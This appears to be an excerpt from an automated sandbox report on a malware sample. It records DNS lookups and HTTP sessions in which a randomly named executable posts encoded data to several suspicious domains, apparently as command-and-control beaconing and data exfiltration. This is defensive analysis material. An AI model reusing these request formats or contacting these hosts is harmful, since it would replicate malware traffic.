                          Sep 23, 2024 14:55:50.512860060 CEST1.1.1.1192.168.2.40x5d4No error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:55:50.512860060 CEST1.1.1.1192.168.2.40x5d4No error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:04.111285925 CEST1.1.1.1192.168.2.40x4aecNo error (0)www.prj81oqde1.buzz154.212.219.2A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:18.980065107 CEST1.1.1.1192.168.2.40x9581No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:56:18.980065107 CEST1.1.1.1192.168.2.40x9581No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:18.980117083 CEST1.1.1.1192.168.2.40x9581No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:56:18.980117083 CEST1.1.1.1192.168.2.40x9581No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:32.769280910 CEST1.1.1.1192.168.2.40xcd2eNo error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                          Sep 23, 2024 14:56:32.769280910 CEST1.1.1.1192.168.2.40xcd2eNo error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                          Sep 23, 2024 14:56:32.769280910 CEST1.1.1.1192.168.2.40xcd2eNo error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                          • www.newdaydawning.net
                          • www.40wxd.top
                          • www.uburn.xyz
                          • www.i16zb920d.cfd
                          • www.o731lh.vip
                          • www.nakama2-sshl.xyz
                          • www.zz82x.top
                          • www.tukaari.shop
                          • www.prj81oqde1.buzz
                          • www.komart.shop
                          • www.healthyloveforall.net
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973644.213.25.70802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:12.142323017 CEST461OUTGET /7mju/?oB=mVppHlHxM&3jE8o=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.newdaydawning.net
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:54:13.258982897 CEST475INHTTP/1.1 301 Moved Permanently
                          Date: Mon, 23 Sep 2024 12:54:12 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Location: http://newdaydawning.net/7mju/?oB=mVppHlHxM&3jE8o=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw=
                          Connection: close
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          Sep 23, 2024 14:54:13.280519009 CEST5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449738206.119.82.134802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:28.781163931 CEST711OUTPOST /l8if/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.40wxd.top
                          Origin: http://www.40wxd.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.40wxd.top/l8if/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 65 68 72 35 77 39 31 46 5a 75 6b 70 45 30 31 65 59 72 46 79 50 31 58 56 68 43 51 64 5a 32 50 35 67 3d 3d
                          Data Ascii: 3jE8o=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
                          Sep 23, 2024 14:54:29.679450035 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:54:29 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449739206.119.82.134802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:31.371500969 CEST731OUTPOST /l8if/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.40wxd.top
                          Origin: http://www.40wxd.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.40wxd.top/l8if/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 69 6d 30 69 6e 43 63 44 37 56 6d 33 6c 49 4c 62 2f 4d 36 6d 6d 2b 31 64 71 42 56 52 50 52 74 70 42 32 45 6d 35 7a 47 62 58 73 37 6d 6d 52 51 75 68 54 4d 4b 31 4f 77 71 44 6a 6f 54 61 48 30 4e 51 6c 5a 62 77 33 41 62 69 58 48 56 34 2f 47 51 6f 6d 68 76 63 4e 4f 33 74 58 74 76 73 49 49 52 4d 4e 52 69 65 6e 69 69 4e 61 65 79 62 4b 55 31 36 39 67 67 64 4d 69 78 50 4d 6a 36 51 31 74 45 49 32 50 6c 69 6c 76 50 70 4b 53 67 50 52 6b 49 6d 4c 6b 51 61 4c 47 69 68 5a 71 76 31 62 72 69 6a 5a 31 41 64 59 41 42 32 4d 30 31 78 6f 3d
                          Data Ascii: 3jE8o=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTim0inCcD7Vm3lILb/M6mm+1dqBVRPRtpB2Em5zGbXs7mmRQuhTMK1OwqDjoTaH0NQlZbw3AbiXHV4/GQomhvcNO3tXtvsIIRMNRieniiNaeybKU169ggdMixPMj6Q1tEI2PlilvPpKSgPRkImLkQaLGihZqv1brijZ1AdYAB2M01xo=
                          Sep 23, 2024 14:54:32.420396090 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:54:32 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449740206.119.82.134802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:33.963784933 CEST10813OUTPOST /l8if/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.40wxd.top
                          Origin: http://www.40wxd.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.40wxd.top/l8if/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 6a 65 30 69 77 43 63 52 6f 4e 6d 32 6c 49 4c 46 50 4d 2f 6d 6d 2b 30 64 75 74 5a 52 50 63 50 70 48 79 45 6e 63 6e 47 64 6c 55 37 73 6d 52 51 6a 42 54 33 58 46 4f 68 71 44 7a 6b 54 61 33 30 4e 51 6c 5a 62 32 7a 41 64 7a 58 48 54 34 2f 46 52 6f 6d 39 72 63 4e 6d 33 74 66 39 76 73 39 39 52 66 56 52 69 2b 33 69 67 2f 69 65 6f 62 4b 57 30 36 39 34 67 59 55 74 78 50 41 46 36 52 78 58 45 49 53 50 31 45 31 79 61 6f 58 4b 6b 4a 35 57 57 57 50 6b 58 4b 37 65 70 79 4d 56 75 45 6e 4b 67 41 6c 46 46 4f 4a 52 45 45 34 31 70 31 42 59 54 43 4e 71 35 39 47 59 78 62 4d 63 31 5a 31 6f 33 2b 6f 63 46 4e 4f 63 6a 6d 47 4c 30 69 37 67 4f 6e 37 69 6a 6f 68 42 5a 41 4a 46 7a 41 63 6c 59 31 72 58 35 32 46 4b 79 6e 76 51 6d 51 64 74 34 6a 4d 63 64 47 6b 73 6e 44 4b 63 34 53 2f 45 67 6b 4a 65 31 6d 33 33 72 78 64 63 2f 50 58 6a 45 59 4c 41 52 37 34 4f 4e 45 68 39 4a 69 47 6e 4b 61 36 58 [TRUNCATED]
                          Data Ascii: 3jE8o=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTje0iwCcRoNm2lILFPM/mm+0dutZRPcPpHyEncnGdlU7smRQjBT3XFOhqDzkTa30NQlZb2zAdzXHT4/FRom9rcNm3tf9vs99RfVRi+3ig/ieobKW0694gYUtxPAF6RxXEISP1E1yaoXKkJ5WWWPkXK7epyMVuEnKgAlFFOJREE41p1BYTCNq59GYxbMc1Z1o3+ocFNOcjmGL0i7gOn7ijohBZAJFzAclY1rX52FKynvQmQdt4jMcdGksnDKc4S/EgkJe1m33rxdc/PXjEYLAR74ONEh9JiGnKa6XT7f7SSb0BplAF7XRei7lr4idmh5+4kLUsJ8TlpCseymrJEwRLeWjIo3v621WKkcd7p7h3h4EtybZbp8Xhw7xmd9K8Z4mj+zQU+/23QAbhGYnDDszksjbFEz0O5t6rIinDH4FDMv20wVMkNj+9JeycTeLN7rVAduZ5k2UcMYv/X3iAux6Hg6LPC4pJA1hCoa/Q0ilX0/6Bef2hqaAzNXSLsKaTcvqgD1OCWWK1/bcYFWDU9WyaUEZiJPVINPSNNeTW/9ZjERrpEb6XY6X+MxPcI8jq3+pwf4GQudZj/l7fhWDNMTZCVZx+WFXN8xe/X60reFoYRg158chviE/GQhDsU20A7S4Lu7FKrvm3KuD05PgaaqrT8OW5/ZBhbOPV3ony969SlXYk2EKeRYbU2+Ay5141ST3Jl11V7n5rlGroiYg4KENNjj/OkMRneYa/ZWxRA2vMauLYmUQMj2S7Wg9Q9JQ0u9b+r6kzXrwKlaIZ8f1jwv1vIesQm61WODnAdiTz/2OY504wAe4kFiAzvwNyMcGJHUeF3hZVgOb33I0IT6pS6/LhTt/zEL8tBmzE1zXlhc5AhJuBSXmbpekg27gUgIiwSnP0P6nt8uBILeLidWiHrflvSk99kIn/9j9IRXfh5S2EaQe7/PR7GZ0eBDRacPWfulX7KgtIK [TRUNCATED]
                          Sep 23, 2024 14:54:34.821854115 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:54:34 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449741206.119.82.134802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:36.503690004 CEST453OUTGET /l8if/?3jE8o=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.40wxd.top
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:54:37.421104908 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:54:37 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.44974267.223.117.189802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:42.490645885 CEST711OUTPOST /iqqs/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.uburn.xyz
                          Origin: http://www.uburn.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.uburn.xyz/iqqs/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 61 39 73 50 4f 57 2f 74 73 77 74 6e 74 73 4b 42 7a 32 69 32 64 4b 4a 2f 69 63 41 54 41 50 57 4f 70 57 72 30 68 68 74 39 66 70 6f 4c 4d 68 53 68 79 65 64 4d 7a 63 59 65 61 42 77 46 64 7a 4d 31 50 41 66 44 51 4b 50 6d 78 53 79 7a 5a 6a 33 68 67 6e 69 43 72 2b 42 41 34 54 74 61 47 70 45 67 31 4f 55 6b 4e 68 55 45 56 43 74 6f 68 6e 5a 2b 30 50 71 4d 68 30 31 4f 39 61 4b 51 34 77 72 44 68 4d 45 6d 4f 38 64 44 6f 44 70 59 6e 33 79 39 70 55 36 76 30 50 4d 6f 54 30 72 63 61 41 4f 77 67 70 52 53 77 37 63 6b 58 7a 33 74 6c 75 75 6a 74 59 4e 4e 67 3d 3d
                          Data Ascii: 3jE8o=S5nO3ybs7ms6Ta9sPOW/tswtntsKBz2i2dKJ/icATAPWOpWr0hht9fpoLMhShyedMzcYeaBwFdzM1PAfDQKPmxSyzZj3hgniCr+BA4TtaGpEg1OUkNhUEVCtohnZ+0PqMh01O9aKQ4wrDhMEmO8dDoDpYn3y9pU6v0PMoT0rcaAOwgpRSw7ckXz3tluujtYNNg==
                          Sep 23, 2024 14:54:43.064127922 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 23 Sep 2024 12:54:42 GMT
                          Server: Apache
                          X-Frame-Options: SAMEORIGIN
                          Content-Length: 32106
                          X-XSS-Protection: 1; mode=block
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                          Sep 23, 2024 14:54:43.064153910 CEST224INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                          Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                          Sep 23, 2024 14:54:43.064169884 CEST1236INData Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                          Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                          Sep 23, 2024 14:54:43.064186096 CEST1236INData Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                          Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color
                          Sep 23, 2024 14:54:43.064199924 CEST1236INData Raw: 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: /images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables
                          Sep 23, 2024 14:54:43.064214945 CEST1236INData Raw: 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74
                          Data Ascii: r" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-
                          Sep 23, 2024 14:54:43.064230919 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 34 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 34 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20
                          Data Ascii: <li><a class="dropdown-item" href="home4.html">Home 4</a></li> </ul> </li> <li class="nav-item dropdown">
                          Sep 23, 2024 14:54:43.064275026 CEST1236INData Raw: 67 68 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 31 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: ght.html">Header 1 Light</a></li> <li><a class="dropdown-item" href="header1-dark.html">Header 1 Dark</a></li><li><a class="dropdown-item" href="header-megamenu.html">Header Mega menu
                          Sep 23, 2024 14:54:43.064291954 CEST1236INData Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d
                          Data Ascii: </a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header3-transparent.html">Header 3 Transparent</a></li>
                          Sep 23, 2024 14:54:43.064307928 CEST1236INData Raw: 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: tml">Header 4 Dark</a></li> </ul> </li> <li><a class="dropdown-item dropdown-toggle
                          Sep 23, 2024 14:54:43.069279909 CEST1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 46 6f 6f 74 65 72 20 31 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a> <ul class="dropdown-menu"> <li><a class="dropdown-item"


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.44974367.223.117.189802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:54:45.041373014 CEST731OUTPOST /iqqs/ HTTP/1.1
